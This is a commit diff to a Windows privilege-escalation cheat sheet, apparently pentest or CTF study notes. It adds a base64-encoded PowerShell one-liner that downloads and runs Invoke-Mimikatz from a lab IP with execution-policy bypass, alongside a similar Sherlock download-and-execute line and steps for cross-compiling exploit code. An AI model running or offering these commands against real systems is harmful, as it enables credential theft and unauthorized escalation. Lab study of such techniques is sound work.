Update windows-privesc.md

mhmh55516 · May 30, 2019 · eba6ddb · eba6ddb
1 parent 6c17adf
commit eba6ddb
Showing 1 changed file with 7 additions and 3 deletions.
diff --git a/windows-privesc.md b/windows-privesc.md
@@ -81,7 +81,11 @@ https://www.youtube.com/watch?v=lP-E5vmZNC0
 ```
 echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Sherlock.ps1'); | powershell -noprofile -
 ```
-Or keep it easy and do...
+Sometimes its easier to encode your PS commands into UTF/base64 like so...
+```
+powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" | iconv --to-code UTF-16LE | base64 -w 0
+```
+Then just run it on your windows shell... 
 ```
 powershell -encodedcommand ADFSDGSDGSDGDSG==
 ```
@@ -92,15 +96,15 @@ powershell -nop -ep bypass
 Import-Module C:\Users\740i\Desktop\Sherlock.ps1
 Find-AllVulns
 ```
-Sometimes compiling all these Windows exploits on Linux can really be a pain in the ass 
+Compiling all these Windows exploits on Linux can really be a pain in the ass 
 ```
 i686-w64-mingw32-gcc exploit.c -o exploit
 ```
 or for 32 bit 
 ```
 i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32 
 ```
-Precompiled...
+Precompiled windows exploits they seem safe...
 
 https://github.com/abatchy17/WindowsExploits